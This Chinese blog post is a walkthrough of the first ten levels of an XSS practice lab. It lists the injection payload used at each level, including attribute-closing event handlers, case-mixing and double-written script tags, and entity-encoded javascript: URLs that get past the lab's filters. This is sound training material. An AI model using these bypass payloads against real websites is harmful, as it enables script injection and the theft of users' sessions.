小白简述XSS靶机(一)

XSS漏洞攻防实战:十关挑战解析
原创 已于 2022-07-20 10:17:16 修改 · 1.3k 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#xss #前端 #javascript

于 2021-03-24 15:08:38 首次发布
本文详细记录了一次XSS漏洞攻防的实战过程,通过十个关卡的挑战,展示了不同场景下XSS攻击代码的构造与防御的破解。从简单的脚本注入到复杂过滤的绕过,再到HTML实体编码与大小写的利用,揭示了XSS攻击的多样性和防御的必要性。

配置环境

虚拟机:Windows7–>IP:192.168.50.248
工具:phpstudy5.4.45
浏览器:火狐渗透版
靶场:

链接:链接:https://pan.baidu.com/s/1l1T1K0QyJrnv22vabC6pRw 
提取码:t6z4

第一关

在这里插入图片描述
先输入XSS的代码

<script>alert(1);</script>

在这里插入图片描述
直接弹窗了,第一关没啥难度

第二关

还是一样,先输入代码

<script>alert(1);</script>

在这里插入图片描述
发现输入的代码打印出来了,按F12查看一下,发现value属性没有加过滤,直接闭合
在这里插入图片描述

输入代码

"><script>alert(1);</script>

在这里插入图片描述

第三关

直接输入

"><script>alert(1);</script>

在这里插入图片描述
发现输入的也是直接打印出来了,还是按F12查看一下,发现尖括号被转义了
在这里插入图片描述
重新构造pyload,鼠标在搜索框里过一下

' onmousemove='javascript:alert(1)

在这里插入图片描述

第四关

直接输入上关的代码
在这里插入图片描述
输入的被打印出来,按F12查看,发现单引号未闭合
在这里插入图片描述
改换成双引号,鼠标移动到搜索框

" onmousemove="javascript:alert(1)

在这里插入图片描述

第五关

使用上关的代码
在这里插入图片描述
输入的被打印出来的,按F12查看,ON被过滤了
在这里插入图片描述

使用html的标签过,并点击搜索框旁边的尖括号

"> <a href='javascript:alert(1)'>

在这里插入图片描述

第六关

使用上关的代码
在这里插入图片描述
输入的被打印出来的,按F12查看,href被过滤了
在这里插入图片描述
使用大小写绕过

"><ScRiPt>alert(1)</ScRIpT>

在这里插入图片描述

第七关

使用上关的代码
在这里插入图片描述
输入的被打印出来的,按F12查看,script被过滤了
在这里插入图片描述
使用双写来绕过

"> <scrscriptipt>alert(1)</scrscriptipt>

在这里插入图片描述

第八关

使用上关的代码
在这里插入图片描述
发现输入的并点击友情链接都给打印出来了,按F12查看,发现是汉字
在这里插入图片描述

那么HTML实体编码并点击友情链接

javascript:alert(1)
&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;

在这里插入图片描述

第九关

使用上关的代码
在这里插入图片描述
提示连接不合法,那么重新构造一下

javascrip&#x74;:alert(1)//http://www.baidu.com

在这里插入图片描述

第十关

输入"><script>alert(1);</script>
在这里插入图片描述

输入的打印出来了,按F12查看
在这里插入图片描述
发现t_sort可以使用,构造pyload,并点击搜索框

t_sort=" onclick=alert(1) type="text"

在这里插入图片描述

次简单的xss靶机渗透过程记录
madao
07-01 1353
简单记录次打靶的过程,这里我们作为Samuel Lamotte需要进入公司网站寻找并利用漏洞索要报销,目前已知了登录密码为fzghn4lw。这里我们主要是利用网站存在的存储型xss漏洞去盗取用户cookie。
网安学习日志 XSS靶机训练(xss-labs-master)(1-10)
qq_41819426的博客
01-19 5217
1.第关 页面中我们并没有看到输入框,但是我们看到url中可以进行name值的修改。 看起来应该没有任何的过滤,我们直接输入语句尝试: <script>alert(1)</script> 这里还可以用很多方法,以下列举些常用的方法: <input type=“text” onmouseover=alert(1)> <a href="javascript:alert(1)">a</a> <a onmouseover=“javasc
XSS靶机通关以及XSS介绍
S_cx666的博客
08-01 763
XSS靶机通关
XSS(跨站脚本攻击)详解【场景、影响、检测、防护】
最新发布
NeoLshu的博客
09-28 1377
本文全面解析了XSS(跨站脚本攻击)的原理、分类、示例及防护策略。XSS攻击通过注入恶意脚本,利用浏览器信任执行窃取凭证、篡改页面等操作。分为反射型、存储型和DOM型三种类型,攻击后果严重,可导致会话劫持、数据泄露等风险。文章提供了易受攻击的代码示例及修复方案,强调根据不同输出上下文进行编码(如HTML、JavaScript转义),并推荐使用白名单过滤和安全的DOM操作API(如textContent)。检测方法包括手工测试、黑盒扫描和代码审计。防护核心在于输入验证、输出编码和严格的内容安全策略(CSP)。
xsslabs靶机解题_web 攻击靶机解题过程
weixin_39625337的博客
12-19 256
sql注入靶机攻击过程请参考https://pentesterlab.com/exercises/from_sqli_to_shell/coursehttp://www.sohu.com/a/126855490_472906xss靶机的攻击过程请参考https://pentesterlab.com/exercises/xss_and_mysql_file/course在192.168.179.12...
xsslabs靶机解题_web渗透靶机平台介绍
weixin_39673601的博客
12-19 386
正文:.dvwa资源 (sql,xss,csrf,暴力,Command Injection,File Inclusion,File Upload,Insecure CAPTCHA)sql-labs资源(单 sql 的全面学习,普通,时间,bool,报错,事件,联合)网络安全实验室(脚本关,注入关,上传关,解密关,综合关)实验吧(web,密码学,安全杂项,逆向,隐写,编程,溢出)+(些综合型的...
XSS基础及搭建DVWA靶机
CoderOne
01-20 530
XSS简述 跨站脚本攻击XSS(Cross Site Scripting),通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。XSS是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。 XSS原理 HTML是种超文本标记语言,通过将些字符特殊地对待来区别文本和标记,例如,小于符号(<)被看作是HTML
练习二:靶场练习(xss-labs)
07-16
在网络安全领域,跨站脚本攻击(Cross-Site Scripting,简称XSS)是种常见的攻击技术,它允许攻击者将恶意脚本注入到其他用户的浏览器中。XSS攻击可以通过多种途径发生,包括但不限于在用户输入、页面数据以及搜索...
精选资源
web漏扫-appscan漏扫软件扫描靶机并分析-xss,sql等详细笔记总结
06-30
web漏扫-appscan漏扫软件扫描靶机并分析-xss,sql等详细笔记总结
xss-labs-master靶机1-20关解题思路
qq_41734243的博客
05-09 7723
xss-labs-master第关第二关第三关第四关第五关第六关第七关第八关第九关第十关 xss-labs-master有二十关 在这篇文章中,默认读者已有WEB渗透测试相关知识,以及PHP、HTML等相关知识。 第关 a、后台代码 <!DOCTYPE html><!--STATUS OK--><html> <head> <meta ht...
xss靶机攻略
2401_88360043的博客
10-29 1024
xss靶机攻略
xss.haozi.me靶机
newlife1441的博客
07-28 466
对auto和on开头只要加上等于号就会变为下划线,加上大于号大于号也会变为下划线,这里其实就是过滤了autoforce和onerror事件,我们可以使用个换行的技巧前提要加个type属性值image和src映射路径属性,然后再让等于号和属性分开。虽然这里对我们可以使用的单引号、双引号等字符进行了转义但是我们可以发现,如果我们输入双引号它会显示/",并没有将双引号成功过滤,所以我们还是可以去使用。alert(1)时需要换行。.........
xss靶机训练【实现弹窗即成功】
Miracle_ze的博客
07-29 4397
xss的绕过
xss靶机过关
weixin_63083809的博客
08-02 552
alert(1)原理样闭合value输入">alert(1)>alert(1)
xss.haozi.me在线靶机挑战
m0_49137360的博客
08-01 559
xss.haozi.me靶场练习
web靶场——xss-labs靶机平台的搭建和代码审计
weixin_51525416的博客
09-05 6584
web靶场-xss-labs靶机平台的搭建和代码审计
网络安全-靶机pikachu之xss注入与代码分析(XSStrike实战)
关注网络安全、云原生安全
10-27 6753
本文使用靶机pikachu,来练习下工具XSStrike 常用命令 -u url --skip 跳过确认提示 --skip-dom 跳过dom型扫描 --data post型时的数据 更多内容查看:网络安全-XSStrike中文手册(自学笔记) 反射型XSS(get) 输入kobe 正常 可以看到,是get型,页面返回正常 攻击 python xsstrike.py -u "http://127.0.0.1/pikachu/vul/xss/xss_reflected_get.p
【转载】XSS靶机专项练习(总结)
xhc6666的博客
05-22 734
XSS靶机测试专项练习总结
跨站脚本攻击xss-labs(1-20)靶机练手
duoba_an的博客
03-03 2362
XSS又叫CSS(Cross Site Script)跨站脚本攻击,是指恶意攻击者往web页面中插入恶意代码,当用户浏览该网页时,嵌入其中的恶意代码会被执行,从而达到恶意的特殊目的。XSS属于被动式的攻击。XSS最大的特点就是能注入恶意的HTML/JavaScript代码到用户浏览的网页上,从而达到劫持用户会话的目的。由于HTML代码和客户端JavaScript脚本能在受害者主机上的浏览器任意执行,这样等同于完全控制了Web客户端的逻辑,在这个基础上,黑客或攻击者可以轻易地发动各种各样的攻击。
cisp-pte xss靶机
01-02
### CISP-PTE XSS练习平台资源教程下载 #### 关于CISP-PTE XSS靶机的信息汇总 对于希望深入学习和实践XSS攻击及其防御技术的人来说,找到合适的CISP-PTE XSS练习平台至关重要。这类平台通常提供了系列模拟真实环境下的Web应用安全挑战,帮助使用者掌握识别、利用以及修复各种类型的XSS漏洞的能力。 #### 推荐的在线资源与工具 - **OWASP Juice Shop**: 这是个广受好评的学习型电商平台,内置了大量的安全漏洞供学员探索,其中包括多种形式的XSS实例[^1]。 - **DVWA (Damn Vulnerable Web Application)**: DVWA 是另个流行的开源项目,它提供了不同难度级别的XSS实验场景,非常适合初学者逐步提升技能水平[^2]。 - **PortSwigger Web Security Academy**: 此网站不仅拥有丰富的理论文章,还设有互动式的实验室来指导用户完成特定的安全任务,特别是针对XSS部分有详细的课程讲解和实际操作机会[^3]。 #### 获取更多资料的方法 为了获得更全面的知识体系和技术支持,在线社区如GitHub上存在许多由爱好者维护的安全测试框架和文档集合;此外,官方认证培训机构也会定期发布更新的教学材料和服务信息,这些都是宝贵的学习途径之。 ```bash # 使用git命令克隆个公开的安全研究仓库作为参考资料 $ git clone https://github.com/your-repo-name.git ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值